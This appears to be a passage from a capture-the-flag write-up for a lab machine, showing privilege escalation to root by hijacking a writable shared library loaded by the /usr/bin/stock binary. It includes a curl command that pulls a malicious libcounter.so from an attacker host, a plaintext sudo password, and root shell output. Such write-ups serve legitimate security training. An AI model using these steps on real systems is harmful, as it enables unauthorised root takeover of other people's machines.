Library Hijacking
According to the debugging, the custom binary, /usr/bin/stock, makes a system call to load a library; /home/rektsu/.config/libcounter.so
Since the current user is able to write to the directory, I will attempt to provide a malicious libcounter.so file to have the binary load it
rektsu@zipping:/home/rektsu$ curl -s http://10.10.14.4/libcounter.so -o /home/rektsu/.config/libcounter.so ; chmod 777 /home/rektsu/.config/libcounter.so ; ll /home/rektsu/.config/libcounter.so
-rwxrwxrwx 1 rektsu rektsu 462 aug 30 16:08 /home/rektsu/.config/libcounter.so*Delivering the payload and changing the permission bits for access
rektsu@zipping:/home/rektsu$ sudo -u root /usr/bin/stock
enter the password: It prompts for authentication. Providing the password here will make the system call to load the malicious shared object library that I planted earlier.
enter the password: St0ckM4nager
root@zipping:/home/rektsu# whoami
root
root@zipping:/home/rektsu# hostname
zipping
root@zipping:/home/rektsu# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.229 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:5009 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:5009 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:50:09 txqueuelen 1000 (Ethernet)
RX packets 2349926 bytes 376400528 (376.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2423445 bytes 1127820947 (1.1 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 45261 bytes 3485914 (3.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 45261 bytes 3485914 (3.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise